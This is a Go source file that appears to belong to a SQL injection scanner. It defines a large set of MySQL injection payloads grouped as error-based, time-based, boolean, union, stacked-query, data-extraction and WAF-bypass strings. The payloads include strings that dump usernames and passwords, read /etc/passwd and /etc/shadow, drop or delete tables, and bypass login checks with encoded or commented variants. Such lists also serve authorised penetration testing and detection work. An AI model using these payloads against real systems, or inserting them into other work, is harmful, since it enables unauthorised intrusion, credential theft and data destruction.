package payloads

var MySQL = PayloadGroup{
	DBMS: "MySQL",
	Payloads: []Payload{
		// ═══════════════════════════════════════════
		// ERROR-BASED (ExtractValue, UpdateXML, etc.)
		// ═══════════════════════════════════════════
		{Type: "error", Content: "1' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT USER()),0x7e))--"},
		{Type: "error", Content: "1' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT DATABASE()),0x7e))--"},
		{Type: "error", Content: "1' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT @@VERSION),0x7e))--"},
		{Type: "error", Content: "1' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT schema_name FROM information_schema.schemata LIMIT 0,1),0x7e))--"},
		{Type: "error", Content: "1' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 0,1),0x7e))--"},
		{Type: "error", Content: "1' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT column_name FROM information_schema.columns WHERE table_schema=DATABASE() AND table_name='users' LIMIT 0,1),0x7e))--"},
		{Type: "error", Content: "1' AND UPDATEXML(1,CONCAT(0x7e,(SELECT USER()),0x7e),1)--"},
		{Type: "error", Content: "1' AND UPDATEXML(1,CONCAT(0x7e,(SELECT DATABASE()),0x7e),1)--"},
		{Type: "error", Content: "1' AND UPDATEXML(1,CONCAT(0x7e,(SELECT @@VERSION),0x7e),1)--"},
		{Type: "error", Content: "' AND (SELECT COUNT(*) FROM information_schema.tables GROUP BY CONCAT(0x7e,(SELECT table_name FROM information_schema.tables LIMIT 0,1),0x7e,FLOOR(RAND(0)*2)))--"},
		{Type: "error", Content: "1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(0x7e,(SELECT (SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata)),0x7e,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) a)--"},
		{Type: "error", Content: "1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(0x7e,(SELECT user),0x7e,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) a)--"},
		{Type: "error", Content: "1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(0x7e,(SELECT @@datadir),0x7e,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) a)--"},
		{Type: "error", Content: "1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(0x7e,(SELECT @@basedir),0x7e,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) a)--"},
		{Type: "error", Content: "1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(0x7e,(SELECT @@hostname),0x7e,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) a)--"},
		{Type: "error", Content: "1' AND (SELECT GTID_SUBSET(CONCAT(0x7e,(SELECT USER()),0x7e),1))--"},
		{Type: "error", Content: "1' AND (SELECT GTID_SUBTRACT(CONCAT(0x7e,(SELECT DATABASE()),0x7e),1))--"},
		{Type: "error", Content: "1' AND (SELECT NAME_CONST(SUBSTRING((SELECT @@VERSION),1,1),0))--"},
		{Type: "error", Content: "1' AND (SELECT * FROM (SELECT NAME_CONST(ROUND(1746*1746),0),NAME_CONST(ROUND(1746*1746),0)) a)--"},
		{Type: "error", Content: "' OR ROW(1,1) > (SELECT COUNT(*),CONCAT(0x7e,(SELECT user),0x7e,FLOOR(RAND(0)*2)) x FROM (SELECT 1 UNION SELECT 2) a GROUP BY x)--"},
		{Type: "error", Content: "1' OR (SELECT 1 FROM (SELECT 1,COUNT(*),CONCAT(0x7e,(SELECT @@version),0x7e,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x) a)--"},

		// ═══════════════════════════════════════════
		// TIME-BASED (SLEEP, BENCHMARK, Heavy Query)
		// ═══════════════════════════════════════════
		{Type: "time", Content: "' AND SLEEP(5)--"},
		{Type: "time", Content: "' AND SLEEP(10)--"},
		{Type: "time", Content: "' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--"},
		{Type: "time", Content: "1' AND (SELECT 2144 FROM (SELECT(SLEEP(5)))qwer)--"},
		{Type: "time", Content: "1' AND IF(1=1,SLEEP(5),0)--"},
		{Type: "time", Content: "' AND BENCHMARK(5000000,MD5('test'))--"},
		{Type: "time", Content: "' AND BENCHMARK(10000000,MD5(1))--"},
		{Type: "time", Content: "' AND BENCHMARK(20000000,SHA1('abc'))--"},
		{Type: "time", Content: "' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1"},
		{Type: "time", Content: "' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- "},
		{Type: "time", Content: "1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) UNION SELECT 1,2,3--"},
		{Type: "time", Content: "1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) GROUP BY 1,2,3--"},
		{Type: "time", Content: "' AND ORD(MID((SELECT IFNULL(CAST(SLEEP(5) AS CHAR),0x20)),1,1))--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM (SELECT SLEEP(5)) a)--"},
		{Type: "time", Content: "' AND (SELECT SLEEP(5) FROM DUAL)--"},
		{Type: "time", Content: "' AND ELT(1,SLEEP(5))--"},
		{Type: "time", Content: "' AND (SELECT SLEEP(5) UNION SELECT 1)--"},
		{Type: "time", Content: "' AND IFNULL(SLEEP(5),1)--"},
		{Type: "time", Content: "1' AND (SELECT (CASE WHEN (1=1) THEN SLEEP(5) ELSE 1 END))--"},
		{Type: "time", Content: "1' AND (SELECT (CASE WHEN ASCII(SUBSTRING((SELECT DATABASE()),1,1))>64 THEN SLEEP(5) ELSE 1 END))--"},
		{Type: "time", Content: "' AND GET_LOCK('test',5)--"},
		{Type: "time", Content: "' AND RELEASE_LOCK('test')--"},
		{Type: "time", Content: "' AND IS_FREE_LOCK('test')--"},
		{Type: "time", Content: "' AND (SELECT (1 FROM (SELECT(SLEEP(10)))a))--"},
		{Type: "time", Content: "1' AND IF(SUBSTRING((SELECT USER()),1,1)='r',SLEEP(5),1)--"},
		{Type: "time", Content: "' AND (SELECT SLEEP(5) WHERE 1=1)--"},
		{Type: "time", Content: "' AND (SELECT SLEEP(5) WHERE 1=2)--"},
		{Type: "time", Content: "') OR SLEEP(5)--"},
		{Type: "time", Content: "')) OR SLEEP(5)--"},
		{Type: "time", Content: "1')) OR SLEEP(5)--"},

		// ═══════════════════════════════════════════
		// BOOLEAN-BASED (True/False comparison)
		// ═══════════════════════════════════════════
		{Type: "boolean", Content: "' AND 1=1--", Expected: "true"},
		{Type: "boolean", Content: "' AND 1=2--", Expected: "false"},
		{Type: "boolean", Content: "' AND (SELECT 1)=1--", Expected: "true"},
		{Type: "boolean", Content: "' AND (SELECT 1)=2--", Expected: "false"},
		{Type: "boolean", Content: "1' AND 1=1--", Expected: "true"},
		{Type: "boolean", Content: "1' AND 1=2--", Expected: "false"},
		{Type: "boolean", Content: "' AND (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))=1--", Expected: "true"},
		{Type: "boolean", Content: "' AND (SELECT (CASE WHEN (1=2) THEN 1 ELSE 0 END))=1--", Expected: "false"},
		{Type: "boolean", Content: "' AND IF(1=1,1,0)--", Expected: "true"},
		{Type: "boolean", Content: "' AND IF(1=2,1,0)--", Expected: "false"},
		{Type: "boolean", Content: "' AND ASCII(SUBSTRING((SELECT DATABASE()),1,1))>64--", Expected: "true"},
		{Type: "boolean", Content: "' AND ASCII(SUBSTRING((SELECT DATABASE()),1,1))<64--", Expected: "false"},
		{Type: "boolean", Content: "' AND (SELECT 1 FROM (SELECT(1))a)='1'--", Expected: "true"},
		{Type: "boolean", Content: "' AND (SELECT 'a' FROM (SELECT(1))a)='a'--", Expected: "false"},
		{Type: "boolean", Content: "' AND (SELECT COUNT(*) FROM information_schema.tables)>0--", Expected: "true"},
		{Type: "boolean", Content: "' AND (SELECT COUNT(*) FROM nonexistent_table)>0--", Expected: "false"},
		{Type: "boolean", Content: "' AND (SELECT 1 FROM information_schema.schemata LIMIT 0,1)=1--", Expected: "true"},
		{Type: "boolean", Content: "' OR 1=1--", Expected: "true"},
		{Type: "boolean", Content: "' OR 1=2--", Expected: "false"},
		{Type: "boolean", Content: "' OR '1'='1'--", Expected: "true"},
		{Type: "boolean", Content: "' OR '1'='2'--", Expected: "false"},
		{Type: "boolean", Content: "' OR 1=1 #", Expected: "true"},
		{Type: "boolean", Content: "' OR '1'='1' #", Expected: "true"},
		{Type: "boolean", Content: "' OR '1'='1'/*", Expected: "true"},
		{Type: "boolean", Content: "' OR 1=1/*", Expected: "true"},

		// ═══════════════════════════════════════════
		// UNION-BASED (Column count, NULL injection)
		// ═══════════════════════════════════════════
		{Type: "union", Content: "' ORDER BY 1--"},
		{Type: "union", Content: "' ORDER BY 2--"},
		{Type: "union", Content: "' ORDER BY 3--"},
		{Type: "union", Content: "' ORDER BY 4--"},
		{Type: "union", Content: "' ORDER BY 5--"},
		{Type: "union", Content: "' ORDER BY 6--"},
		{Type: "union", Content: "' ORDER BY 7--"},
		{Type: "union", Content: "' ORDER BY 8--"},
		{Type: "union", Content: "' ORDER BY 9--"},
		{Type: "union", Content: "' ORDER BY 10--"},
		{Type: "union", Content: "' UNION SELECT NULL--"},
		{Type: "union", Content: "' UNION SELECT NULL,NULL--"},
		{Type: "union", Content: "' UNION SELECT NULL,NULL,NULL--"},
		{Type: "union", Content: "' UNION SELECT NULL,NULL,NULL,NULL--"},
		{Type: "union", Content: "' UNION SELECT NULL,NULL,NULL,NULL,NULL--"},
		{Type: "union", Content: "' UNION SELECT 1,2,3--"},
		{Type: "union", Content: "' UNION SELECT 1,2,3,4--"},
		{Type: "union", Content: "' UNION SELECT 1,2,3,4,5--"},
		{Type: "union", Content: "' UNION SELECT 1,2,3,4,5,6--"},
		{Type: "union", Content: "' UNION SELECT 1,2,3,4,5,6,7--"},
		{Type: "union", Content: "' UNION SELECT 1,2,3,4,5,6,7,8--"},
		{Type: "union", Content: "' UNION SELECT 1,2,3,4,5,6,7,8,9--"},
		{Type: "union", Content: "' UNION SELECT 1,2,3,4,5,6,7,8,9,10--"},
		{Type: "union", Content: "' UNION ALL SELECT 1,2,3--"},
		{Type: "union", Content: "' UNION ALL SELECT NULL,NULL,NULL--"},
		{Type: "union", Content: "' UNION DISTINCT SELECT 1,2,3--"},
		{Type: "union", Content: "1' UNION SELECT @@VERSION,2,3--"},
		{Type: "union", Content: "1' UNION SELECT USER(),2,3--"},
		{Type: "union", Content: "1' UNION SELECT DATABASE(),2,3--"},
		{Type: "union", Content: "1' UNION SELECT (SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata),2,3--"},
		{Type: "union", Content: "1' UNION SELECT (SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE()),2,3--"},

		// ═══════════════════════════════════════════
		// STACKED QUERIES
		// ═══════════════════════════════════════════
		{Type: "stacked", Content: "'; SELECT 1;--"},
		{Type: "stacked", Content: "'; SELECT SLEEP(5);--"},
		{Type: "stacked", Content: "'; DROP TABLE IF EXISTS test;--"},
		{Type: "stacked", Content: "'; CREATE TABLE test (id INT);--"},
		{Type: "stacked", Content: "'; INSERT INTO test VALUES (1);--"},
		{Type: "stacked", Content: "'; DELETE FROM test WHERE 1=1;--"},
		{Type: "stacked", Content: "'; UPDATE test SET id=1 WHERE 1=1;--"},

		// ═══════════════════════════════════════════
		// DATA EXTRACTION (information_schema)
		// ═══════════════════════════════════════════
		{Type: "deep", Content: "' UNION SELECT GROUP_CONCAT(schema_name),NULL,NULL FROM information_schema.schemata--"},
		{Type: "deep", Content: "' UNION SELECT GROUP_CONCAT(DISTINCT schema_name),NULL,NULL FROM information_schema.schemata--"},
		{Type: "deep", Content: "' UNION SELECT table_name,NULL,NULL FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 0,10--"},
		{Type: "deep", Content: "' UNION SELECT GROUP_CONCAT(table_name),NULL,NULL FROM information_schema.tables WHERE table_schema=DATABASE()--"},
		{Type: "deep", Content: "' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users' LIMIT 0,10--"},
		{Type: "deep", Content: "' UNION SELECT GROUP_CONCAT(column_name),NULL,NULL FROM information_schema.columns WHERE table_name='users'--"},
		{Type: "deep", Content: "' UNION SELECT GROUP_CONCAT(CONCAT_WS(0x3a,username,password)),NULL,NULL FROM users--"},
		{Type: "deep", Content: "' UNION SELECT GROUP_CONCAT(CONCAT_WS(0x3a,id,username,password,email)),NULL,NULL FROM admin--"},
		{Type: "deep", Content: "' UNION SELECT GROUP_CONCAT(column_name),NULL,NULL FROM information_schema.columns WHERE table_schema='mysql'--"},
		{Type: "deep", Content: "' UNION SELECT LOAD_FILE('/etc/passwd'),NULL,NULL--"},
		{Type: "deep", Content: "' UNION SELECT LOAD_FILE('/etc/shadow'),NULL,NULL--"},
		{Type: "deep", Content: "' UNION SELECT LOAD_FILE(CONCAT(0x2f,0x65,0x74,0x63,0x2f,0x70,0x61,0x73,0x73,0x77,0x64)),NULL,NULL--"},
		{Type: "deep", Content: "' UNION SELECT @@GLOBAL.version_compile_os,NULL,NULL--"},
		{Type: "deep", Content: "' UNION SELECT @@GLOBAL.datadir,NULL,NULL--"},
		{Type: "deep", Content: "' UNION SELECT @@GLOBAL.basedir,NULL,NULL--"},
		{Type: "deep", Content: "' UNION SELECT @@GLOBAL.plugin_dir,NULL,NULL--"},

		// ═══════════════════════════════════════════
		// ADVANCED TIME-BASED (Heavy Queries)
		// ═══════════════════════════════════════════
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM (SELECT 1)a JOIN (SELECT 1)b JOIN (SELECT 1)c JOIN (SELECT 1)d JOIN (SELECT 1)e JOIN (SELECT 1)f JOIN (SELECT 1)g JOIN (SELECT 1)h)--"},
		{Type: "time", Content: "' AND (SELECT RAND(0) * SLEEP(5) FROM INFORMATION_SCHEMA.TABLES LIMIT 1)--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS a, INFORMATION_SCHEMA.COLUMNS b, INFORMATION_SCHEMA.COLUMNS c)--"},
		{Type: "time", Content: "' AND (SELECT (SELECT SLEEP(5) FROM (SELECT 1) a))--"},
		{Type: "time", Content: "' AND (SELECT 1 FROM (SELECT SLEEP(5)) a)--"},
		{Type: "time", Content: "' AND (SELECT 1 FROM (SELECT(SLEEP(5))) a)--"},
		{Type: "time", Content: "1' AND (SELECT+1 FROM(SELECT(SLEEP(5)))a)--"},
		{Type: "time", Content: "1' AND (SELECT 1 FROM (SELECT SLEEP(5)) a) LIMIT 1--"},
		{Type: "time", Content: "' AND ELT(1,SLEEP(5))--"},
		{Type: "time", Content: "' AND (SELECT 1 FROM (SELECT SLEEP(5)) a) AND '1'='1"},
		{Type: "time", Content: "' AND (SELECT 1 FROM (SELECT SLEEP(5)) a) AND '%'='%"},
		{Type: "time", Content: "') AND SLEEP(5)--"},
		{Type: "time", Content: "')) AND SLEEP(5)--"},
		{Type: "time", Content: "\" AND SLEEP(5)--"},
		{Type: "time", Content: "\") AND SLEEP(5)--"},
		{Type: "time", Content: "1' OR SLEEP(5)--"},
		{Type: "time", Content: "1') OR SLEEP(5)--"},
		{Type: "time", Content: "1\" OR SLEEP(5)--"},
		{Type: "time", Content: "1\") OR SLEEP(5)--"},

		// ADVANCED BOOLEAN (Edge Cases)
		// ═══════════════════════════════════════════
		{Type: "boolean", Content: "1') AND 1=1--", Expected: "true"},
		{Type: "boolean", Content: "1') AND 1=2--", Expected: "false"},
		{Type: "boolean", Content: "' AND 1=1 AND 1=1--", Expected: "true"},
		{Type: "boolean", Content: "' AND 1=1 AND 1=2--", Expected: "false"},
		{Type: "boolean", Content: "' OR 1=1 AND '1'='1", Expected: "true"},
		{Type: "boolean", Content: "' OR 1=2 AND '1'='1", Expected: "false"},
		{Type: "boolean", Content: "' AND NOT 1=2--", Expected: "true"},
		{Type: "boolean", Content: "' AND NOT 1=1--", Expected: "false"},
		{Type: "boolean", Content: "1' AND 1=1-- -", Expected: "true"},
		{Type: "boolean", Content: "1' AND 1=2-- -", Expected: "false"},
		{Type: "boolean", Content: "1' AND '1'='1' AND 1=1--", Expected: "true"},
		{Type: "boolean", Content: "1' AND '1'='2' AND 1=1--", Expected: "false"},

		// ADVANCED ERROR-BASED
		// ═══════════════════════════════════════════
		{Type: "error", Content: "1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(ROUND(RAND()*2),':',(SELECT user()))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x) a)--"},
		{Type: "error", Content: "1' AND (SELECT 1 FROM (SELECT 1,2,3,COUNT(*) FROM INFORMATION_SCHEMA.TABLES GROUP BY CONCAT((SELECT user()),FLOOR(RAND()*2))) a)--"},
		{Type: "error", Content: "' AND EXTRACTVALUE(1, CONCAT(0x7e,(SELECT SUBSTRING( @@VERSION, 1, 32))))--"},
		{Type: "error", Content: "' AND UPDATEXML(1, CONCAT(0x3a,(SELECT SUBSTRING( @@VERSION, 1, 32))),1)--"},
		{Type: "error", Content: "' AND EXTRACTVALUE(1, CONCAT(0x7e,(SELECT CONCAT_WS(0x3a,USER(),DATABASE(),VERSION()))))--"},

		// ADVANCED UNION
		// ═══════════════════════════════════════════
		{Type: "union", Content: "1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--"},
		{Type: "union", Content: "1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12--"},
		{Type: "union", Content: "1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--"},
		{Type: "union", Content: "1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--"},
		{Type: "union", Content: "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--"},
		{Type: "union", Content: "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--"},
		{Type: "union", Content: "1' UNION ALL SELECT 1,2,3,4,5--"},
		{Type: "union", Content: "1\" UNION SELECT 1,2,3--"},
		{Type: "union", Content: "') UNION SELECT 1,2,3--"},
		{Type: "union", Content: "1') UNION SELECT 1,2,3--"},
		{Type: "union", Content: "\") UNION SELECT 1,2,3--"},
		{Type: "union", Content: "1\") UNION SELECT 1,2,3--"},

		// WAF BYPASS (Encoding, Comments, Case)
		// ═══════════════════════════════════════════
		{Type: "bypass", Content: "' /*!50000%53eLEct*/ 1,2,3--"},
		{Type: "bypass", Content: "1' %23%0a OR 1=1 --"},
		{Type: "bypass", Content: "admin' OR '1'='1' /*"},
		{Type: "bypass", Content: "' %00 OR 1=1 --"},
		{Type: "bypass", Content: "' OR 1=1 -- -"},
		{Type: "bypass", Content: "'/**/OR/**/1=1/**/--"},
		{Type: "bypass", Content: "'%0AOR%0A1=1%0A--"},
		{Type: "bypass", Content: "'%0DOR%0D1=1%0D--"},
		{Type: "bypass", Content: "'%09OR%091=1%09--"},
		{Type: "bypass", Content: "0x27204f5220313d31202d2d"},
		{Type: "bypass", Content: "%2527%2520OR%25201%253D1%2520--"},
		{Type: "bypass", Content: "' /*!50000OR*/ 1=1 --"},
		{Type: "bypass", Content: "' /*!12345OR*/ 1=1 --"},
		{Type: "bypass", Content: "' +OR+1=1+--"},
		{Type: "bypass", Content: "' || 1=1 --"},
		{Type: "bypass", Content: "1' || 1=1 --"},
		{Type: "bypass", Content: "' OR '1'='1' -- -"},
		{Type: "bypass", Content: "' OR '1'='1' #"},
		{Type: "bypass", Content: "1' OR '1'='1' #"},
		{Type: "bypass", Content: "1' OR 1=1-- -"},
		{Type: "bypass", Content: "' OR 1=1 #"},
		{Type: "bypass", Content: "1' OR 1=1 #"},
		{Type: "bypass", Content: "' OR 1=1 --+"},
		{Type: "bypass", Content: "1' OR 1=1 --+"},
		{Type: "bypass", Content: "' OR 1=1 -- -"},
		{Type: "bypass", Content: "' OR 1=1 /*"},
		{Type: "bypass", Content: "admin'--"},
		{Type: "bypass", Content: "admin'#"},
		{Type: "bypass", Content: "admin'/*"},
		{Type: "bypass", Content: "admin'-- -"},
		{Type: "bypass", Content: "admin'--+"},
		{Type: "bypass", Content: "admin' OR 1=1--"},
		{Type: "bypass", Content: "admin' OR '1'='1"},
		{Type: "bypass", Content: "admin' OR '1'='1'--"},
		{Type: "bypass", Content: "admin' OR '1'='1'#"},
		{Type: "bypass", Content: "admin' OR 1=1/*"},
	},
}
